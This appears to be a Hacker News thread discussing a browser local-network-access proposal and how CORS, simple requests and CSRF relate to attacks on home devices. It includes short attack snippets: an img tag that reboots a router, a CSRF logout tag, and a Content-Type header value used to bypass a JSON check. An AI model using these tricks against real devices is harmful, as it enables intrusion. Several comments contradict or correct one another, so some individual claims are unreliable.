This is a misunderstanding. Local network devices are protected from random websites by CORS, and have been for many years. It's not perfect, but it's generally quite effective.
The issue is that CORS gates access only on the consent of the target server. It must return headers that opt into receiving requests from the website.
This proposal aims to tighten that, so that even if the website and the network device both actively want to communicate, the user's permission is also explicitly requested. Historically we assumed server & website agreement was sufficient, but Facebook's recent tricks where websites secretly talked to apps on your phone have broken that assumption - websites might be in cahoots with local network servers to work against your interests.
Doesn't CORS just restrict whether the webpage JS context gets to see the response of the target request? The request itself happens anyway, right?
So the attack vector that I can imagine is that JS on the browser can issue a specially crafted request to a vulnerable printer or whatever that triggers arbitrary code execution on that other device. That code might be sufficient to cause the printer to carry out your evil task, including making an outbound connection to the attacker's server. Of course, the webpage would not be able to discover whether it was successful, but that may not be important.
I think CORS is so hard for us to hold in our heads in large part due to how much is stuffed into the algorithm.
It may send an OPTIONS request, or not.
It may block a request being sent (in response to OPTIONS) or block a response from being read.
It may restrict which headers can be set, or read.
It may downgrade the request you were sending silently, or consider your request valid but the response off limits.
It is a matrix of independent gates essentially.
Even the language we use is imprecise, CORS itself is not really doing any of this or blocking things. As others pointed out it’s the Single Origin Policy that is the strict one, and CORS is really an exception engine to allow us to punch through that security layer.
No, a preflight (OPTIONS) request is sent by the browser first prior to sending the request initiated by the application. I would be surprised if it is possible for the client browser to control this OPTIONS request more than just the URL. I am curious if anyone else has any input on this topic though.
Maybe there is some side-channel timing that can be used to determine the existence of a device, but not so sure about actually crafting and delivering a malicious payload.
This tag:
<img src="http://192.168.1.1/router?reboot=1">
triggers a local network GET request without any CORS involvement. I remember back in the day you could embed <img src="http://someothersite.com/forum/ucp.php?mode=logout"> in your forum signature and screw with everyone's sessions across the web
Haha I remember that. The solution at the time for many forum admins was to simply state that anyone found to be doing that would be permabanned. Which was enough to make it stop completely, at least for the forums that I moderated. Different times indeed.
<img src="C:\con\con"></img>
It's essentially the same, as many apps use HTTP server + html client instead of something native or with another IPC.
Exactly you can also trigger forms for POST or DELETE etc. this is called CSRF if the endpoint doesn't validate some token in the request. CORS only protects against unauthorized xhr requests. All decades old OWASP basics really.
That highly ranked comments on HN (an audience with way above average-engineer interest in software and security) get this wrong kinda explains why these things keep being an issue.
I'm betting HN is vastly more normal people and manager types than people want to admit.
None of us had to pass a security test to post here. There's no filter. That makes it pretty likely that HN's community is exactly as shitty as the rest of the internet's.
People need to stop treating this community like some club of enlightened elites. It's hilariously sad and self-congratulatory.
I don't know why you are getting downvoted, you do have a point. Some of the comments appear knowing what CORS headers are, but neither their purpose nor how it relates to CSRF it seems, which is worrying. It's not meant as disparaging. My university thought a course on OWASP thankfully, otherwise I'll probably also be oblivious.
If you're going cross-domain with XHR, I'd hope you're mostly sending json request bodies and not forms.
Though to be fair, a lot of web frameworks have methods to bind named inputs that allow either.
This misses the point a bit. CSRF usually applies to people who want only same domain requests and dont realize that cross domain is an option for the attacker.
In the modern web its much less of an issue due to samesite cookies being default .
> Exactly you can also trigger forms for POST or DELETE etc
You cant do a DELETE from a form. You have to use ajax. If cross DELETE needs preflight.
To nitpick, CSRF is not the ability to use forms per se, but relying solely on the existence of a cookie to authorize actions with side effects.
This expectation is that this should not work - well behaved network devices shouldn't accept a blind GET like this for destructive operations. Plenty of other good reasons for that. No real alternative unless you're also going to block page redirects & links to these URLs as well, which also trigger a similar GET. That would make it impossible to access any local network page without typing it manually.
While it clearly isn't a hard guarantee, in practice it does seem to generally work as these have been known issues without apparent massive exploits for decades. That CORS restrictions block probing (no response provided) does help makes this all significantly more difficult.
"No true Scotsman allows GETs with side effects" is not a strong argument
It's not just HTTP where this is a problem. There are enough http-ish protocols where protocol smuggling confusion is a risk. It's possible to send chimeric HTTP requests at devices which then interpret them as a protocol other than http.
Yes, which is why web browsers way back even in the netscape navigator era had a blacklist of ports that are disallowed.
The idea is, the malicious actor would use a 'simple request' that doesn't need a preflight (basically, a GET or POST request with form data or plain text), and manage to construct a payload that exploits the target device. But I have yet to see a realistic example of such a payload (the paper I read about the idea only vaguely pointed at the existence of polyglot payloads).
There doesn't need to be any kind of "polyglot payload". Local network services and devices that accept only simple HTTP requests are extremely common. The request will go through and alter state, etc.; you just won't be able to read the response from the browser.
Exactly. People who are answering must not have been aware of “simple” requests not requiring preflight.
I can give an example of this; I found such a vulnerability a few years ago now in an application I use regularly.
The target application in this case was trying to validate incoming POST requests by checking that the incoming MIME type was "application/json". Normally, you can't make unauthorized XHR requests with this MIME type as CORS will send a preflight.
However, because of the way it was checking for this (checking if the Content-Type header contained the text "application/json"), It was relatively easy to construct a new Content-Type header that bypasses CORS:
Content-Type: multipart/form-data; boundary=application/json
It's worth bearing in mind in this case that the payload doesn't actually have to be form data - the application was expecting JSON, after all! As long as the web server doesn't do its own data validation (which it didn't in this case), we can just pass JSON as normal.
This was particularly bad because the application allowed arbitrary code execution via this endpoint! It was fixed, but in my opinion, something like that should never have been exposed to the network in the first place.
Oh, you can only send arbitrary text or form submissions. That’s SO MUCH.
You don't even need to be exploiting the target device, you might just be leaking data over that connection.
Yeah, I think this is the reason this proposal is getting more traction again.
Here's a formal definition of such simple requests, which may be more expansive than one might expect: https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/COR...
Some devices don't bother to limit the size of the GET, which can enable a DOS attack at least, a buffer overflow at worst. But I think the most typical vector is a form-data POST, which isn't CSRF-protected because "it's on localhost so it's safe, right?"
I've been that sloppy with dev servers too. Usually not listening on port 80 but that's hardly Ft Knox.
I think that is because it is so old that its basically old news and mostly mitigated.
https://www.kb.cert.org/vuls/id/476267 is an article from 2001 on it.
It can send a json-rpc request to your bitcoin node and empty your wallet
Do you know of any such node that doesn't check the Content-Type of requests and also has no authentication?
Bitcoin Core if you disable authentication
There's no such thing, short of forking it yourself. You can set the username and password to admin:admin if you want, but Bitcoin Core's JSON-RPC server requires an Authorization header on every request [0], and you can't put an Authorization header on a cross-origin request without a preflight.
[0] https://github.com/bitcoin/bitcoin/blob/v29.0/src/httprpc.cp...
Good to know, I remember you used to be able to disable it via config but looks like I was wrong
You’re forgetting { mode: 'no-cors' }, which makes the response opaque (no way to read the data) but completely bypasses the CORS preflight request and header checks.
This is missing important context. You are correct that preflight will be skipped, but there are further restrictions when operating in this mode. They don't guarantee your server is safe, but it does force operation under a “safer” subset of verbs and header fields.
The browser will restrict the headers and methods of requests that can be sent in no-cors mode. (silent censoring in the case of headers, more specifically)
Anything besides GET, HEAD, POST will result in an error in browser, and not be sent.
All headers will be dropped besides the CORS safelisted headers [0]
And Content-Type must be one of urlencoded, form-data, or text-plain. Attempting to use anything else will see the header replaced by text-plain.
[0] https://developer.mozilla.org/en-US/docs/Glossary/CORS-safel...
That’s just not that big of a restriction. Anecdotally, very few JSON APIs I’ve worked with have bothered to check the request Content-Type. (“Minimal” web frameworks without built-in security middleware have been very harmful in this respect.) People don’t know about this attack vector and don’t design their backends to prevent it.
I agree that it is not a robust safety net. But in the instance you’re citing, thats a misconfigured server.
What framework allows you to setup a misconfigured parser out of the box?
I dont mean that as a challenge, but as a server framework maintainer Im genuinely curious. In express we would definitely allow people to opt into this, but you have to explicitly make the choice to go and configure body-parser.json to accept all content types via a noop function for type checking.
Meaning, its hard to get into this state!
Edit to add: there are myriad ways to misconfigure a webserver to make it insecure without realizing. But IMO that is the point of using a server framework! To make it less likely devs will footgun via sane defaults that prevent these scenarios unless someone really wants to make a different choice.
SvelteKit for sure, and any other JS framework that uses the built-in Request class (which doesn’t check the Content-Type when you call json()).
I don’t know the exact frameworks, but I consume a lot of random undocumented backend APIs (web scraper work) and 95% of the time they’re fine with JSON requests with Content-Type: text/plain.
I think you’re making those restrictions out to be bigger than they are.
Does no-cors allow a nefarious company to send a POST request to a local server, running in an app, containing whatever arbitrary data they’d like? Yes, it does. When you control the server side the inability to set custom headers etc doesn’t really matter.
My intent isnt to convince people this is a safe mode, but to share knowledge in the hope someone learns something new today.
I didnt mean it to come across that way. The spec does what the spec does, we should all be aware of it so we can make informed decisions.
Thankfully no-cors also restricts most headers, including setting content-type to anything but the built-in form types. So while CSRF doesn't even need a click because of no-cors, it's still not possible to do csrf with a json-only api. Just be sure the server is actually set up to restrict the content type -- most frameworks will "helpfully" accept and convert form-data by default.
> No, a preflight (OPTIONS) request is sent by the browser first prior to sending the request initiated by the application.
Note: preflight is not required for any type of request that browser js was capable of making prior to CORS being introduced. (Except for local network)
So a simple GET or POST does not require OPTIONS, but if you set a header it might require OPTIONS (unless its a header you could set in the pre-cors world)
It depends. GET requests are assumed not to have side effects, so often don't have a preflight request (although there are cases where it does). But of course, not all sites follow those semantics, and it wouldn't surprise me if printer or router firmware used GETs to do something dangerous.
Also, form submission famously doesn't require CORS.
There is a limited, but potentially effective, attack surface via URL parameters.
I can confirm that local websites that don't implement CORS via the OPTIONS request cannot be browsed with mainstream browsers. Does nothing to prevent non-browser applications running on the local network from accessing your website.
As far as I can tell, the only thing this proposal does that CORS does not already do is provide some level of enterprise configuration control to guard against the scenario where your users are using compromised internet sites that can ping around your internal network for agents running on compromised desktops. Maybe? I don't get it.
If somebody would fix the "no https for local connections" issue, then IoT websites could use authenticated logins to fix both problems. Non-https websites also have no access to browser crypto APIs so roll-your-own auth (the horror) isn't an option either. Fustrating!
I don't believe this is true? As others have pointed out, preflight options requests only happen for non simple requests. Cors response headers are still required to read a cross domain response, but that is still a huge window for a malicious site to try to send side effectful requests to your local network devices that have some badly implemented web server running.
[edit]: I was wrong. Just tested that a moment ago. It turns out NOT to be true. My web server during normal operation is current NOT getting OPTIONS requests at all.
Wondering whether I triggered CORS requests when I was struggling with IPv6 problems. Or maybe it triggers when I redirect index.html requests from IPv6 to IPv4 addresses. Or maybe I got caught by the earlier roll out of version one of this propposal? There was definitely a time while I was developing pipedal when none of my images displayed because my web server wasn't doing CORS. But. Whatever my excuse might be, I was wrong. :-/
Or simply perform a timing attack as a way of exploring the local network, though I'm not sure if the browser implementation immediately returns after the request is made (ex fetch API is called) but before the response is received. Presumably it doesn't, which would expose it to timing attacks as a way of exploring the network.
eBay, for one, has been (was?) fingerprinting users like this for years.
https://security.stackexchange.com/questions/232345/ebay-web...
Almost every js API for making requests is asynchronous so they do return after the request is made. The exception though is synchronous XHR calls, but I'm not sure if those are still supported
... Anyhow I think it doesn't matter because you can listen for the error/failure of most async requests. Cors errors are equivalent to network errors - the browser tells the js it got stays v code 0 with no further information - but the timing of that could lead to some sort of interference? Hard to say what that would be though. Maybe if you knew the target webserver was slow but would respond to certain requests, a slower failed local request could mean it actually reached a target device.
That said, why not just fire off simple http requests with your intended payload? Abusing the csrf vulnerabilities of local network devices seems far easier than trying to make something out of a timing attack here.
This is also a misunderstanding. CORS only applies to the Layer 7 communication. The rest you can figure out from the timing of that.
Significant components of the browser, such as Websockets have no such restrictions at all
Won't the browser still append the "Origin" field to WebSocket requests, allowing servers to reject them?
yes, and that's exactly how discord's websocket communication checks work (allowing them to offer a non-scheme "open in app" from the website).
they also had some kind of RPC websocket system for game developers, but that appears to have been abandoned: https://discord.com/developers/docs/topics/rpc
A WebSocket starts as a normal http request, so it is subject to cors if the initial request was (eg if it was a post)
CORS doesn’t protect you from anything. Quite the opposite: it _allows_ cross origin communication (provided you follow the spec). The same origin policy is what protects you.
I made a CTF challenge 3 years ago that proves why local devices are not so protected. exploitv99 bypasses PNA with timing as the other commentor points out.
https://github.com/adc/ctf-midnightsun2022quals-writeups/tre...
CORS prevents the site from accessing the response body. In some scenarios, a website could, for example, blindly attempt to authenticate to your router and modify settings by guessing your router bran/model and password
> The issue is that CORS gates access only on the consent of the target server. It must return headers that opt into receiving requests from the website.
False. CORS only gates non-simple requests (via options), simple requests are sent regardless of CORS config, there is no gating whatsoever.
How would Facebook do that? They scan all likely local ranges for what could be your phone, and have a web server running on the phone? That seems more like a problem of allowing the phone app to start something like that and keep it running in the background.
Webrtc allows you to find the local ranges.
Typically there are only 256 IP's, so a scan of them all is almost instant.
Do you have a link talking about those Facebook's recent tricks? I think I missed that story, and would love to read an analysis about it
I think this can be circumvented by DNS rebinding, though your requests won't have the authentication cookies for the target, so you would still need some kind of exploit (or a completely unprotected target).
How? The browser would still have to resolve it to a final IP right?
I'm not sure what you mean but this explains it: https://github.blog/security/application-security/localhost-...
Is this kind of attack actually in scope for this proposal? The explainer doesn't mention it.
> Local network devices are protected from random websites by CORS
C'mon. We all know that 99% of the time, Access-Control-Allow-Origin is set to * and not to the specific IP of the web service.
Also, CORS is not in the control of the user while the proposal is. And that's a huge difference.
> but Facebook's recent tricks where websites secretly talked to apps on your phone have broken that assumption - websites might be in cahoots with local network servers to work against your interests.
This isn't going to help for that. The locally installed app, and the website, can both, independently, open a connection to a 3rd party. There's probably enough fingerprinting available for the 3rd party to be able to match them.